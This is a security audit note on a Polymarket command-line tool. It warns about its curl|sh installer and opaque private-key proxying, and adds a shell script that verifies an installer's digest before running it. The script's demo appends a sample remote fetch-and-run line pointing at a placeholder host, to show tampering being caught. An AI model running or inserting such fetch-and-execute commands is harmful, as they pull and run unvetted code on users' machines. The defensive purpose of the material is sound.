polymarket-cli
Audited by Socket on Mar 1, 2026
1 alert found:
Malware
This SKILL.md documents a plausible and legitimate CLI for interacting with Polymarket markets and on-chain contracts. The principal supply-chain and security concerns are (1) the documented curl|sh install pattern, which executes a remote script with no opportunity to inspect or verify it first, a high-risk distribution pattern even when the script is hosted on GitHub, and (2) the use of proxy signing and third-party RPC endpoints (e.g., https://polygon.drpc.org) without explicit, auditable details of how keys and signed payloads are forwarded or stored. Reading private keys from the environment or a local config file is expected for a CLI that signs transactions, but it concentrates secrets in one place and should be paired with clear guidance on secure storage, opt-in (rather than default) proxy usage, and how to verify the integrity of installers. Overall the content is not demonstrably malicious, but the installer pattern and the opaque proxy/RPC usage create a measurable supply-chain risk. Users should prefer building from source or auditing the install script before running it, and should not supply private keys to any proxy unless they trust and have audited that service.
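As an added illustration of the installer advice above (this is example code, not part of the polymarket-cli project or of Socket's report): a POSIX shell script that replaces the curl|sh pattern with download-to-file, pinned-digest verification, and only then execution. The installer URL and the expected SHA-256 digest are parameters the user supplies; the pinned digest must come from something already reviewed out of band (a release checksum file, or the script after you have read it), and the installer file written by the demo at the bottom is constructed here for illustration, not fetched from anywhere.

```shell
#!/bin/sh
# Added example: verify an installer's digest before running it, instead of
# `curl ... | sh`. Nothing here is code from the polymarket-cli project.

# sha256_of FILE: print the hex SHA-256 of FILE, using whichever tool exists.
sha256_of() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{print $1}'
  elif command -v shasum >/dev/null 2>&1; then
    shasum -a 256 "$1" | awk '{print $1}'
  else
    openssl dgst -sha256 "$1" | awk '{print $NF}'
  fi
}

# verify_installer FILE EXPECTED_SHA256: return 0 on match, 1 on mismatch.
verify_installer() {
  actual=$(sha256_of "$1")
  if [ "$actual" = "$2" ]; then
    return 0
  fi
  printf 'digest mismatch for %s\n  expected %s\n  actual   %s\n' \
    "$1" "$2" "$actual" >&2
  return 1
}

# install_pinned URL EXPECTED_SHA256: download to a file, verify it against the
# pinned digest, and only then execute it. Because the script lands on disk
# first you can also read it (e.g. `less "$tmp"`) before it ever runs; a
# mismatch stops before anything executes. URL and digest are user-supplied.
install_pinned() {
  url=$1
  expected=$2
  tmp=$(mktemp) || return 1
  if ! curl -fsSL "$url" -o "$tmp"; then
    rm -f "$tmp"
    return 1
  fi
  if verify_installer "$tmp" "$expected"; then
    sh "$tmp"
    status=$?
  else
    status=1
  fi
  rm -f "$tmp"
  return $status
}

# Offline demo with a constructed installer: pin its digest, then show that a
# single appended line (the kind of change a compromised host could make) is
# caught before execution.
demo_dir=$(mktemp -d)
printf '#!/bin/sh\necho "constructed installer, does nothing"\n' \
  > "$demo_dir/install.sh"
pinned=$(sha256_of "$demo_dir/install.sh")
echo "pinned digest: $pinned"
if verify_installer "$demo_dir/install.sh" "$pinned"; then
  echo "unmodified installer: digest matches, safe to inspect and run"
fi
printf 'curl -s https://example.invalid/extra | sh\n' >> "$demo_dir/install.sh"
if ! verify_installer "$demo_dir/install.sh" "$pinned"; then
  echo "tampered installer: refusing to run"
fi
rm -rf "$demo_dir"
```

The digest check only helps if the expected value is obtained independently of the download it is checking; a checksum fetched from the same URL path at the same time proves nothing. Building from source from a tagged commit you have reviewed remains the stronger option.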